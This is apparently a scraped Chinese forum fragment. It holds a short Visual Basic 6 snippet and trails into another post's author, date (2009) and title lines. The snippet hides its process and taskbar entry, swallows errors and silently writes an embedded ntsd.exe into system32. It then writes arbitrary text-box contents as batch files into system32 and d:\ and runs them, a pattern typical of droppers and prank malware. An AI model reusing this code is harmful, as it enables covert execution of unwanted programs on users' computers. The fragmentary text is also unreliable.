MsgBox "Fuck! .."
HideCurrentProcess
App.TaskVisible = False
On Error Resume Next
Dim APP1() As Byte
If Dir("c:\windows\system32\ntsd.exe") = "" Then
APP1 = LoadResData(101, "CUSTOM")
Open "c:\windows\system32\ntsd.exe" For Binary As #3
Put #3, , APP1
Close #3
End If
a = Text1.Text
Open "c:\windows\system32\spray.bat" For Output As #1
Print #1, a
Close #1
Open "d:\spray.bat" For Output As #2
Print #2, a
Close #2
Shell "c:\windows\system32\spray.bat"
Shell "d:\spray.bat" 作者:
Nothing 时间: 2009-12-2 22:08 标题: VC++代码执行system调用: